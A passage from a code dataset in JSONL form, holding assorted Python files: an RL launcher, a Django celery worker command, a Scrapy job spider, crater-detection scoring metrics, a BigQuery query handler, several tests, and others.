agent_builder, networks, task_progression, num_primitives, redundancy, args, device):\n transformation_builder = cls.create_transformation_builder(\n state_dim=task_progression.state_dim, \n action_dim=task_progression.action_dim, \n args=args)\n\n if args.clone:\n agents, unique_agents = cls.create_cloned_agents(\n agent_builder=agent_builder,\n networks=networks, \n transformation_builder=transformation_builder, \n num_primitives=num_primitives,\n redundancy=redundancy,\n args=args, \n device=device)\n else:\n agents, unique_agents = cls.create_uncloned_agents(\n agent_builder=agent_builder,\n networks=networks, \n transformation_builder=transformation_builder,\n num_primitives=num_primitives,\n redundancy=redundancy,\n args=args, \n device=device)\n\n agents = sorted(agents, key=lambda x: x.id) # need to make sure the index corresponds to agent id\n unique_agents = sorted(unique_agents, key=lambda x: x.id) # need to make sure the index corresponds to agent id\n return agents, unique_agents\n\n @classmethod\n def create_agents(cls, agent_builder, networks, task_progression, redundancy, args, device):\n agents = cls.create_agents_generic(\n agent_builder=agent_builder, \n networks=networks, \n task_progression=task_progression, \n num_primitives=task_progression.action_dim,\n redundancy=redundancy, \n args=args, \n device=device)\n return agents\n\n @classmethod\n def main(cls, parse_args):\n args, device = cls.initialize(parse_args())\n logger = MultiBaseLogger(args=args)\n task_progression = cls.create_task_progression(logger, args)\n organism = cls.create_organism(device, task_progression, args)\n rl_alg = rlalg_switch(args.alg_name)(device=device, args=args)\n experiment_builder = cls.experiment_switch(args.env_name[0])\n experiment = experiment_builder(\n society=organism, \n task_progression=task_progression,\n rl_alg=rl_alg,\n logger=logger,\n device=device,\n args=args)\n experiment.main_loop(max_epochs=args.max_epochs)\n\n\nif __name__ == '__main__':\n launcher = DecentralizedLauncher()\n launcher.main(parse_args)\n\n\n# # python information_economy/scratch/vickrey.py --rlalg ppo --env MiniGrid-Empty-Random-5x5-v0 --envtype mg --policy cbeta --debug --auctiontype bb --critic cnn\n","sub_path":"auction/vickrey.py","file_name":"vickrey.py","file_ext":"py","file_size_in_byte":12576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"199295277","text":"from typing import List\n\nimport Globals\nimport SourceManager\n\n\nclass ComicManager:\n\n comicList: List[SourceManager.Comic] = []\n sourceList: List[SourceManager.ComicStripInfo] = []\n currentComic = -1\n\n def __init__(self, length=Globals.ImageItems):\n '''\n :param length: Number of comic from each source\n '''\n\n self.sourceList = SourceManager.read_json()\n self.comicList = self.load_comics(length)\n\n print('comics loaded')\n\n def load_comics(self, length=Globals.ImageItems):\n print('Loading Comics ...')\n comics = []\n\n for source in self.sourceList:\n comic = SourceManager.download_comic(source, length)\n comics.append(comic)\n\n return comics\n\n def get_comic(self, comic_index=0):\n comic = self.comicList[comic_index]\n self.currentComic = comic_index\n return comic\n\n def get_next(self):\n if self.currentComic < len(self.comicList):\n self.currentComic += 1\n return self.comicList[self.currentComic]\n else:\n self.load_comics()\n\n def get_prev(self):\n if self.currentComic > 0:\n self.currentComic -= 1\n return self.comicList[self.currentComic]\n\n\n","sub_path":"src/ComicManager.py","file_name":"ComicManager.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"647374444","text":"# -*- coding: utf-8 -*-\nfrom assertpy import assert_that\nimport pytest\nfrom typing import Union, AnyStr, Pattern\nfrom sarah import ValueObject\nimport re\n\n\nclass TestInit(object):\n class MyValue(ValueObject):\n def __init__(self, key1=\"spam\", key2=\"ham\", key3=None):\n pass\n\n obj1 = MyValue(key1=\"Foo\",\n key2=\"ham\",\n key3={'123': \"spam\", 'ham': 456})\n\n assert_that(obj1[\"key1\"]).is_equal_to(\"Foo\")\n assert_that(obj1[\"key2\"]).is_equal_to(\"ham\")\n assert_that(obj1[\"key3\"]).is_equal_to({'ham': 456, '123': \"spam\"})\n\n obj2 = MyValue(key1=\"Foo\",\n key3={'ham': 456, '123': \"spam\"})\n\n assert_that(obj1).is_equal_to(obj2)\n assert_that(hash(obj1)).is_equal_to(hash(obj2))\n\n\nclass TestOverride(object):\n class MyValueWithInit(ValueObject):\n def __init__(self, pattern: Union[Pattern, AnyStr]=None, key1=\"spam\"):\n if isinstance(pattern, str):\n self['pattern'] = re.compile(pattern)\n\n obj1 = MyValueWithInit(pattern=\"str\",\n key1=\"Foo\")\n obj2 = MyValueWithInit(pattern=re.compile(\"str\"),\n key1=\"Foo\")\n\n assert_that(obj1) \\\n .described_as(\"obj1.pattern is properly converted to regexp pattern\") \\\n .is_equal_to(obj2)\n\n assert_that(hash(obj1)).is_equal_to(hash(obj2))\n\n\nclass TestMalformedClassDeclaration(object):\n class MyValueWithKWArgs(ValueObject):\n def __init__(self, **kwargs):\n pass\n\n with pytest.raises(ValueError) as e:\n obj1 = MyValueWithKWArgs(pattern=\"str\",\n key1=\"Foo\")\n\n assert_that(e.value.args[0]) \\\n .is_equal_to(\"__init__ with *args or **kwargs are not allowed\")\n","sub_path":"tests/test_value_object.py","file_name":"test_value_object.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"455405133","text":"import os\nimport subprocess\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.template.loader import render_to_string\n\nfrom snoop.profiler import Profiler\n\nfrom ... import tasks\n\n\ndef celery_argv(custom_workers_no, queues):\n workers_multiplier = 1\n cpu_count = os.cpu_count()\n max_workers_no = min(int(cpu_count * 1.5), 100)\n\n celery_binary = (\n subprocess.check_output(['which', 'celery'])\n .decode('latin1')\n .strip()\n )\n\n argv = [\n celery_binary,\n '-A', 'snoop.data',\n '--loglevel=info',\n 'worker',\n '-Ofair',\n '--max-tasks-per-child', '500',\n '-Q', ','.join(queues),\n ]\n\n workers_no = int(custom_workers_no) if custom_workers_no else int(cpu_count * workers_multiplier)\n if workers_no > max_workers_no:\n print(f'Limitting the number of workers to {max_workers_no} on {cpu_count} CPUs.')\n workers_no = max_workers_no\n else:\n print(f'Starting with {workers_no} workers on {cpu_count} CPUs.')\n\n argv += ['-c', str(workers_no)]\n\n return argv\n\n\ndef create_procfile(celery_args):\n with open('Procfile', 'w') as procfile:\n out = render_to_string('snoop/Procfile', context={'workers_command': ' '.join(celery_args)})\n procfile.write(out)\n\n\nclass Command(BaseCommand):\n help = \"Run celery worker\"\n\n def add_arguments(self, parser):\n parser.add_argument('func', nargs='*',\n help=\"Task types to run\")\n parser.add_argument('-n', '--workers-no',\n help=\"Number of workers to start\")\n parser.add_argument('-p', '--prefix',\n help=\"Prefix to insert to the queue name\")\n\n def handle(self, *args, **options):\n with Profiler():\n tasks.import_shaormas()\n if options.get('prefix'):\n prefix = options['prefix']\n settings.TASK_PREFIX = prefix\n else:\n prefix = settings.TASK_PREFIX\n queues = options.get('func') or tasks.shaormerie\n argv = celery_argv(\n custom_workers_no=options.get('workers_no'),\n queues=[f'{prefix}.{queue}' for queue in queues] + ['watchdog'],\n )\n print('+', *argv)\n create_procfile(argv)\n honcho_binary = (\n subprocess.check_output(['which', 'honcho'])\n .decode('latin1')\n .strip()\n )\n os.execv(honcho_binary, [honcho_binary, 'start'])\n","sub_path":"snoop/data/management/commands/runworkers.py","file_name":"runworkers.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"449537318","text":"#!/usr/bin/env python3\nfrom lilaclib import *\n\nmaintainers = [{'github': 'petronny', 'email': 'Jingbei Li '}]\nupdate_on = [{'aur': None}]\nrepo_depends = [\n 'hipblas',\n 'hipcub',\n 'hipsparse',\n 'rocalution',\n 'rocblas',\n 'rocfft',\n 'rocprim',\n 'rocrand',\n 'rocsparse',\n 'rocthrust',\n ]\nbuild_prefix = 'extra-x86_64'\npre_build = aur_pre_build\npost_build = aur_post_build\n\nif __name__ == '__main__':\n single_main(build_prefix)\n","sub_path":"rocm-libs/lilac.py","file_name":"lilac.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"461571893","text":"\"\"\"\n This spider is a Ifgprojectresourcing spider created on top of the ATSSpider\n scrapy crawl ifgprojectresourcing -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.ifgprojectresourcing.com/opportunities.html\"\n\n sample job url:\n http://www.ifgprojectresourcing.com/job/jobdetails.html?id=11023\n\"\"\"\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix\n\n\nclass Ifgprojectresourcing(ATSSpider):\n\n name = \"ifgprojectresourcing\"\n item_map = {\n 'Pay Rate': 'baseSalary',\n 'Location': 'location',\n 'Job Type ': 'jobtype',\n 'Job ID': 'ref_num',\n }\n\n def parse(self, response):\n selector = Selector(response)\n tableheads = selector.xpath(\n '//div[@class=\"postentry\"]/table/tr/td//strong/text()').extract()\n meta_xpaths = {}\n for th in tableheads:\n if th in self.item_map:\n meta_xpaths[self.item_map[th]] = \".//tr/td[\" + str(\n tableheads.index(th) + 1\n ) + \"]/div/text()\"\n\n jobs = selector.xpath(\n '//div[@class=\"postentry\"]/form[contains(@name, \"form\")]//tr/td[@class=\"subtitle\"]'\n )\n for job in jobs:\n url = job.xpath('.//tr/td/a[@class=\"lbOn\"]/@href').extract()\n if url:\n meta = {}\n for mx in meta_xpaths:\n meta[mx] = job.xpath(meta_xpaths[mx]).extract()\n\n meta['title'] = job.xpath(\n './/span[@class=\"subtitle\"]/text()').extract()\n yield Request(\n callback=self.parse_job_callback(),\n meta=meta,\n url=url[0]\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n loader.add_xpath(\n 'company_description', '//div[@id=\"Layer1\"]/table//tr[last()-1]'\n )\n loader.add_xpath(\n 'description', '//div[@id=\"Layer1\"]/table//tr[last()]'\n )\n\n loader.add_value(\n 'referencenumber', response.meta.get('ref_num'),\n Prefix('%s-' % self.name)\n )\n loader.add_value('baseSalary', response.meta.get('baseSalary'))\n loader.add_value('jobtype', response.meta.get('jobtype'))\n loader.add_value('location', response.meta.get('location'))\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/ifgprojectresourcing.py","file_name":"ifgprojectresourcing.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"102869182","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dataportal3', '0031_auto_20160416_2343'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='spatialsurveylinkgroup',\n name='geom_table_name',\n ),\n migrations.RemoveField(\n model_name='spatialsurveylinkgroup',\n name='survey',\n ),\n migrations.AddField(\n model_name='spatialsurveylink',\n name='data_formatting',\n field=models.TextField(null=True, blank=True),\n ),\n ]\n","sub_path":"dataportal3/migrations/0032_auto_20160503_1535.py","file_name":"0032_auto_20160503_1535.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"410430006","text":"import re\nimport datetime\n\n\nclass ImpalaStats(object):\n ITEMS_TO_TRACK = [\n 'admission-controller.*',\n 'jvm.total.*',\n 'impala.thrift-server.*',\n 'impala-server.num-queries',\n 'impala-server.num-queries-expired',\n 'memory.rss',\n 'memory.total-used',\n 'tcmalloc.*'\n ]\n\n def __init__(self, statsd):\n self._statsd = statsd\n\n def send(self, node, payload):\n #print(payload)\n now = datetime.datetime.now()\n for pattern in self.ITEMS_TO_TRACK:\n for key in payload['metric_group']['metrics']:\n #print(\"keyname = \" + key[\"name\"] + \"\\n\")\n if re.match(pattern, str(key['name'])):\n #print(now.isoformat() + \": Regex matches \" + key['name'] + \"\\tvalue: \" + str(key['value']) + \" node: \" + node)\n extended_key = \"{}.{}\".format(node.replace(':25000', '').replace('.', '_'), key[\"name\"])\n self._statsd.gauge(extended_key, int(key[\"value\"]))\n\n for item in payload['metric_group']['child_groups']:\n for key in item['metrics']:\n #print(\"keyname = \" + key[\"name\"] + \"\\n\")\n if re.match(pattern, str(key['name'])):\n #print(now.isoformat() + \": Regex matches #2 \" + key[\"name\"] + \"\\tvalue: \" + str(key['value']) + \" node: \" + node)\n extended_key = \"{}.{}\".format(node.replace(':25000', '').replace('.', '_'), key[\"name\"])\n self._statsd.gauge(extended_key, int(key[\"value\"]))\n","sub_path":"impala_monitor/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"262446750","text":"import sys,pysam, time,os,copy,argparse,subprocess, random, re, datetime\nimport numpy as np\nimport multiprocessing as mp\nfrom pysam import VariantFile\nfrom subprocess import Popen, PIPE, STDOUT\nfrom Bio import pairwise2\nfrom intervaltree import Interval, IntervalTree\n\ngt_map={(0,0):0, (1,1):1, (0,1):2, (1,0):2,(1,2):3, (2,1):3}\n\nmapping={'A':0,'G':1,'T':2,'C':3,'-':4}\nrev_base_map={0:'A',1:'G',2:'T',3:'C',4:'-'}\n\nallele_map={('I','I'):0, ('D','D'):1, ('N','I'):2, ('I','N'):3, ('N','D'):4, ('D','N'):5, \\\n ('I','D'):6, ('D','I'):7, ('N','N'):8}\n\ndef pairwise(x,y):\n alignments = pairwise2.align.globalms(x, y, 2, -1.0, -0.9, -0.1)\n\n return alignments\n\ndef msa(seq_list, ref, v_pos, mincov, maxcov):\n np.random.seed(812)\n sample=list(seq_list.keys())\n \n if len(sample) > maxcov:\n sample=random.sample(sample,min(len(sample),maxcov))\n\n sample=sorted(sample)\n \n fa_tmp_file=''.join(['>%s_SEQ\\n%s\\n'%(read_name,seq_list[read_name]) for read_name in sample])\n\n\n fa_tmp_file+='>ref_SEQ\\n%s' %ref\n \n gap_penalty=1.0\n msa_process =Popen(['muscle', '-quiet','-gapopen','%.1f' %gap_penalty,'-maxiters', '1' ,'-diags1'], stdout=PIPE, stdin=PIPE, stderr=PIPE)\n hap_file=msa_process.communicate(input=fa_tmp_file.encode('utf-8'))\n\n if len(hap_file)==0:\n print('hapfile length 0')\n\n\n tmp=hap_file[0].decode('utf-8')[1:].replace('\\n','').split('>')\n\n zz_0=[]\n for seq in tmp:\n p1,p2=seq.split('_SEQ')\n if p1!='ref':\n zz_0.append(p2[:128])\n else:\n ref_real_0=p2\n\n if len(zz_0)=dct['mincov'] and len(read_names_1)>=dct['mincov']:\n output['pos'].append(pcol.pos+1)\n \n if in_bed(include_intervals, v_pos) and not ex_bed(exclude_intervals, v_pos): \n read_names=pcol.get_query_names()\n read_names_0=set(read_names) & hap_reads_0\n read_names_1=set(read_names) & hap_reads_1\n len_seq_0=len(read_names_0)\n len_seq_1=len(read_names_1)\n \n if len_seq_0>=dct['mincov'] and len_seq_1>=dct['mincov']:\n seq=[x for x in pcol.get_query_sequences( mark_matches=False, mark_ends=False, add_indels=True)]\n\n tmp_seq_0=''.join([s for n,s in zip(read_names,seq) if n in read_names_0])\n tmp_seq_1=''.join([s for n,s in zip(read_names,seq) if n in read_names_1])\n\n del_freq_0=(tmp_seq_0.count('-'))/len_seq_0 if len_seq_0>0 else 0\n ins_freq_0=tmp_seq_0.count('+')/len_seq_0 if len_seq_0>0 else 0\n\n del_freq_1=(tmp_seq_1.count('-'))/len_seq_1 if len_seq_1>0 else 0\n ins_freq_1=tmp_seq_1.count('+')/len_seq_1 if len_seq_1>0 else 0\n\n if 0.3<=del_freq_0 or 0.3<=del_freq_1 or 0.3<=ins_freq_0 or 0.3<=ins_freq_1:\n output['high'].append(pcol.pos+1)\n\n elif del_freq_0<=0.2 and del_freq_1<=0.2 and ins_freq_0<=0.1 and ins_freq_1<=0.1 and np.random.randint(100)==0:\n output['low'].append(pcol.pos+1)\n \n \n if output['pos']:\n tr_len=len(output['pos']) \n else:\n tr_len=20\n \n sizes={'high':tr_len, 'low':tr_len}\n\n output['pos']=set(output['pos'])\n \n \n for i in ['high','low']:\n if sizes[i]= 0:\n sumGasRmn += gasRmn\n else:\n sumGasRmn = gasRmn\n start = i\n totalGasRmn += gasRmn\n if totalGasRmn >= 0:\n return start\n else:\n return -1\n ","sub_path":"leetcodepy/src/problemset/GasStation.py","file_name":"GasStation.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"164875680","text":"from os import path\nfrom collections import Counter\nimport csv\n\nDATA_DIR = 'tempdata'\nfilename = path.join(DATA_DIR, 'wrangledbabynames.csv')\nsearch_list = ['Michael', 'Kelly', 'Kanye', 'THOR',\n 'casey', 'Arya', 'ZZZblahblah']\n\nindex = {}\nwith open(filename, 'r') as csv_file:\n rows = csv.DictReader(csv_file)\n for row in rows:\n lower_name = row['name'].lower()\n index[lower_name] = row\n\ndef analyze_name(name):\n lower_name = name.lower()\n if lower_name in index:\n return index[lower_name]\n return {'name': name,\n 'gender': 'NA',\n 'ratio': None,\n 'males': None,\n 'females': None,\n 'total': 0}\n\ngender_counts = Counter()\nfemale_babies_count = 0\nmale_babies_count = 0\nfor name in search_list:\n data = analyze_name(name)\n print(name, data['gender'], data['ratio'])\n gender_counts[data['gender']] += 1\n if data['females']:\n female_babies_count += int(data['females'])\n if data['males']:\n male_babies_count += int(data['males'])\nprint('Total:')\nprint(*['{}: {}'.format(gender, gender_counts[gender])\n for gender in sorted(gender_counts.keys())\n ])\nprint('females: {} males: {}'.format(female_babies_count, male_babies_count))\n","sub_path":"exercises/0020-gender-detector/k.py","file_name":"k.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"133698592","text":"from __future__ import division\n\nimport numpy as np\nfrom scipy.optimize import linear_sum_assignment\n\nfrom .detection_base import DetectionBaseScoreType\n\nfrom ..iou import cc_iou as iou\n\n\ndef _select_minipatch_tuples(minipatch, y_true, y_pred):\n \"\"\"\n\n Parameters\n ----------\n minipatch : list of int\n Bounds of the internal scoring patch\n y_true, y_pred : list of tuples\n Full list of labels and predictions\n\n Returns\n -------\n y_true, y_pred : list of tuples\n List of labels and predictions restricted to\n the central minipatch\n\n \"\"\"\n row_min, row_max, col_min, col_max = minipatch\n\n y_true = np.asarray(y_true)\n y_pred = np.asarray(y_pred)\n\n y_true_cut = ((y_true[0] >= col_min) & (y_true[0] < col_max) &\n (y_true[1] >= row_min) & (y_true[1] < row_max))\n y_pred_cut = ((y_pred[0] >= col_min) & (y_pred[0] < col_max) &\n (y_pred[1] >= row_min) & (y_pred[1] < row_max))\n\n return y_true[y_true_cut].tolist(), y_pred[y_pred_cut].tolist()\n\n\ndef _match_tuples(y_true, y_pred, minipatch=None):\n \"\"\"\n Given set of true and predicted (x, y, r) tuples, determine the best\n possible match.\n\n Parameters\n ----------\n y_true, y_pred : list of tuples\n\n Returns\n -------\n (idxs_true, idxs_pred, ious)\n idxs_true, idxs_pred : indices into y_true and y_pred of matches\n ious : corresponding IOU value of each match\n\n The length of the 3 arrays is identical and the minimum of the length\n of y_true and y_pred\n\n \"\"\"\n\n n_true = len(y_true)\n n_pred = len(y_pred)\n\n if minipatch is not None:\n y_true, y_pred = _select_minipatch_tuples(minipatch, y_true, y_pred)\n\n iou_matrix = np.empty((n_true, n_pred))\n\n for i in range(n_true):\n for j in range(n_pred):\n iou_matrix[i, j] = iou(y_true[i], y_pred[j])\n\n idxs_true, idxs_pred = linear_sum_assignment(1 - iou_matrix)\n\n if (not idxs_true.size) or (not idxs_pred.size):\n ious = np.array([])\n else:\n ious = iou_matrix[idxs_true, idxs_pred]\n return idxs_true, idxs_pred, ious\n\n\ndef _count_matches(y_true, y_pred, matches, iou_threshold=0.5):\n \"\"\"\n Count the number of matches.\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n\n Returns\n -------\n (n_true, n_pred_all, n_pred_correct):\n Number of true craters\n Number of total predicted craters\n Number of correctly predicted craters\n\n \"\"\"\n val_numbers = []\n\n for y_true_p, y_pred_p, match_p in zip(y_true, y_pred, matches):\n n_true = len(y_true_p)\n n_pred = len(y_pred_p)\n\n _, _, ious = match_p\n p = (ious >= iou_threshold).sum()\n\n val_numbers.append((n_true, n_pred, p))\n\n n_true, n_pred_all, n_pred_correct = np.array(val_numbers).sum(axis=0)\n\n return n_true, n_pred_all, n_pred_correct\n\n\ndef _locate_matches(y_true, y_pred, matches, iou_threshold=0.5):\n \"\"\"\n Given list of list of matching craters, return contiguous array of all\n craters x, y, r.\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n\n Returns\n -------\n loc_true, loc_pred\n Each is 2D array (n_patches, 3) with x, y, r columns\n\n \"\"\"\n loc_true = []\n loc_pred = []\n\n for y_true_p, y_pred_p, matches_p in zip(y_true, y_pred, matches):\n\n for idx_true, idx_pred, iou_val in zip(*matches_p):\n if iou_val >= iou_threshold:\n loc_true.append(y_true_p[idx_true])\n loc_pred.append(y_pred_p[idx_pred])\n\n if loc_true:\n return np.array(loc_true), np.array(loc_pred)\n else:\n return np.empty((0, 3)), np.empty((0, 3))\n\n\ndef precision(y_true, y_pred, matches=None, iou_threshold=0.5,\n minipatch=None):\n \"\"\"\n Precision score (fraction of correct predictions).\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n Threshold to determine match\n\n Returns\n -------\n precision_score : float [0 - 1]\n \"\"\"\n if matches is None:\n matches = [_match_tuples(t, p, minipatch=minipatch)\n for t, p in zip(y_true, y_pred)]\n\n n_true, n_pred_all, n_pred_correct = _count_matches(\n y_true, y_pred, matches, iou_threshold=iou_threshold)\n\n return n_pred_correct / n_pred_all\n\n\ndef recall(y_true, y_pred, matches=None, iou_threshold=0.5,\n minipatch=None):\n \"\"\"\n Recall score (fraction of true objects that are predicted).\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n Threshold to determine match\n\n Returns\n -------\n recall_score : float [0 - 1]\n \"\"\"\n if matches is None:\n matches = [_match_tuples(t, p, minipatch=minipatch)\n for t, p in zip(y_true, y_pred)]\n\n n_true, n_pred_all, n_pred_correct = _count_matches(\n y_true, y_pred, matches, iou_threshold=iou_threshold)\n\n return n_pred_correct / n_true\n\n\ndef mad_radius(y_true, y_pred, matches=None, iou_threshold=0.5,\n minipatch=None):\n \"\"\"\n Relative Mean absolute deviation (MAD) of the radius.\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n Threshold to determine match\n\n Returns\n -------\n mad_radius : float > 0\n \"\"\"\n if matches is None:\n matches = [_match_tuples(t, p, minipatch=minipatch)\n for t, p in zip(y_true, y_pred)]\n\n loc_true, loc_pred = _locate_matches(\n y_true, y_pred, matches, iou_threshold=iou_threshold)\n\n return np.abs((loc_pred[:, 2] - loc_true[:, 2]) / loc_true[:, 2]).mean()\n\n\ndef mad_center(y_true, y_pred, matches=None, iou_threshold=0.5,\n minipatch=None):\n \"\"\"\n Relative Mean absolute deviation (MAD) of the center (relative to the\n radius of the true object).\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n Threshold to determine match\n\n Returns\n -------\n mad_center : float > 0\n \"\"\"\n if matches is None:\n matches = [_match_tuples(t, p, minipatch=minipatch)\n for t, p in zip(y_true, y_pred)]\n\n loc_true, loc_pred = _locate_matches(\n y_true, y_pred, matches, iou_threshold=iou_threshold)\n\n d = np.sqrt((loc_pred[:, 0] - loc_true[:, 0]) ** 2 + (\n loc_pred[:, 1] - loc_true[:, 1]) ** 2)\n\n return np.abs(d / loc_true[:, 2]).mean()\n\n\n# ScoreType classes\n\n\nclass Precision(DetectionBaseScoreType):\n is_lower_the_better = False\n minimum = 0.0\n maximum = 1.0\n\n def __init__(self, name='precision', precision=2, conf_threshold=0.5,\n minipatch=None):\n self.name = name\n self.precision = precision\n self.conf_threshold = conf_threshold\n self.minipatch = minipatch\n\n def detection_score(self, y_true, y_pred):\n return precision(y_true, y_pred, minipatch=self.minipatch)\n\n\nclass Recall(DetectionBaseScoreType):\n is_lower_the_better = False\n minimum = 0.0\n maximum = 1.0\n\n def __init__(self, name='recall', precision=2, conf_threshold=0.5,\n minipatch=None):\n self.name = name\n self.precision = precision\n self.conf_threshold = conf_threshold\n self.minipatch = minipatch\n\n def detection_score(self, y_true, y_pred):\n return recall(y_true, y_pred, minipatch=self.minipatch)\n\n\nclass MAD_Center(DetectionBaseScoreType):\n is_lower_the_better = True\n minimum = 0.0\n maximum = np.inf\n\n def __init__(self, name='mad_center', precision=2, conf_threshold=0.5,\n minipatch=None):\n self.name = name\n self.precision = precision\n self.conf_threshold = conf_threshold\n self.minipatch = minipatch\n\n def detection_score(self, y_true, y_pred):\n return mad_center(y_true, y_pred, minipatch=self.minipatch)\n\n\nclass MAD_Radius(DetectionBaseScoreType):\n is_lower_the_better = True\n minimum = 0.0\n maximum = np.inf\n\n def __init__(self, name='mad_radius', precision=2, conf_threshold=0.5,\n minipatch=None):\n self.name = name\n self.precision = precision\n self.conf_threshold = conf_threshold\n self.minipatch = minipatch\n\n def detection_score(self, y_true, y_pred):\n return mad_radius(y_true, y_pred, minipatch=self.minipatch)\n","sub_path":"workflow/scores/precision_recall.py","file_name":"precision_recall.py","file_ext":"py","file_size_in_byte":8782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"620939809","text":"#!/usr/bin/python3\n\nimport socket\n\nnumero_port_serveur = 80 # identique à celui du client\nadresse_serveur = socket.gethostbyname('www.unilim.fr')\nma_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # ou AF_INET6\nma_socket.connect((adresse_serveur,numero_port_serveur))\nrequete = b\"GET / HTTP/1.0\\r\\nHost: www.unilim.fr\\r\\n\\r\\n\"\n\nma_socket.sendall(requete)\n\nwhile 1:\n ligne = ma_socket.recv(1000)\n if not ligne:\n break\n print(ligne)\nma_socket.close()\n","sub_path":"exo9.py","file_name":"exo9.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"402466992","text":"\n\n#Query C On average which URL produced the best story in 2010?\n\nfrom google.cloud import bigquery\nimport webapp2\nimport uuid\nimport time\n\n#class\nclass scoreAvg(webapp2.RequestHandler):\n def get(self):\n rs = self.get_result()\n text = \"\"\"\n \n url Avg_score TIME_STAMP \n \"\"\"\n for i in xrange(len(rs)):\n text += ''\n text += '%s ' % rs[i][0]\n text += '%d ' % rs[i][1]\n text += '%s ' % rs[i][2]\n text += ' '\n text += '
'\n self.response.write(text)\n# async wating\n def __wait_for_job(self, job):\n while True:\n job.reload() # Refreshes the state via a GET request.\n if job.state == 'DONE':\n if job.error_result:\n raise RuntimeError(job.errors)\n return\n time.sleep(1) \n\n def get_result(self):\n sql = \"\"\" SELECT \n url,\n avg(score) as avg_score, \n time_ts as TIME_STAMP \n FROM `bigquery-public-data.hacker_news.stories`\n where EXTRACT(YEAR from time_ts) = 2015\n GROUP BY url, TIME_STAMP \n ORDER BY avg_score DESC\n Limit 5\n \"\"\"\n client = bigquery.Client('extreme-core-158121')\n job = client.run_async_query(str(uuid.uuid4()), sql)\n ds = client.dataset('results')\n if not ds.exists():\n ds.create()\n ds.reload()\n\n tbl = ds.table('table_c')\n #tbl.reload()\n job.destination = tbl \n job.use_legacy_sql = False\n\n job.begin()\n self.__wait_for_job(job)\n\n\n # Drain the query results by requesting a page at a time.\n query_results = job.results()\n page_token = None\n rs = []\n while True:\n rows, total_rows, page_token = query_results.fetch_data(\n max_results=500,\n page_token=page_token)\n\n rs += rows\n\n if not page_token:\n break\n return rs\n","sub_path":"url_avg.py","file_name":"url_avg.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"609928836","text":"from ftw.testbrowser import browsing\nfrom opengever.testing import IntegrationTestCase\n\n\nclass TestRepositoryAPI(IntegrationTestCase):\n\n @browsing\n def test_can_get_repository_root(self, browser):\n self.login(self.regular_user, browser=browser)\n browser.open(self.repository_root, method=\"GET\", headers={\"Accept\": \"application/json\"})\n self.assertEqual(200, browser.status_code)\n expected_repository_root = {\n u'@components': {\n u'actions': {u'@id': u'http://nohost/plone/ordnungssystem/@actions'},\n u'breadcrumbs': {u'@id': u'http://nohost/plone/ordnungssystem/@breadcrumbs'},\n u'navigation': {u'@id': u'http://nohost/plone/ordnungssystem/@navigation'},\n u'types': {u'@id': u'http://nohost/plone/ordnungssystem/@types'},\n u'workflow': {u'@id': u'http://nohost/plone/ordnungssystem/@workflow'},\n },\n u'@id': u'http://nohost/plone/ordnungssystem',\n u'@type': u'opengever.repository.repositoryroot',\n u'UID': u'createrepositorytree000000000001',\n u'allow_discussion': False,\n u'created': u'2016-08-31T07:01:33+00:00',\n u'id': u'ordnungssystem',\n u'is_folderish': True,\n u'items': [\n {\n u'@id': u'http://nohost/plone/ordnungssystem/fuhrung',\n u'@type': u'opengever.repository.repositoryfolder',\n u'description': u'Alles zum Thema F\\xfchrung.',\n u'review_state': u'repositoryfolder-state-active',\n u'title': None,\n },\n 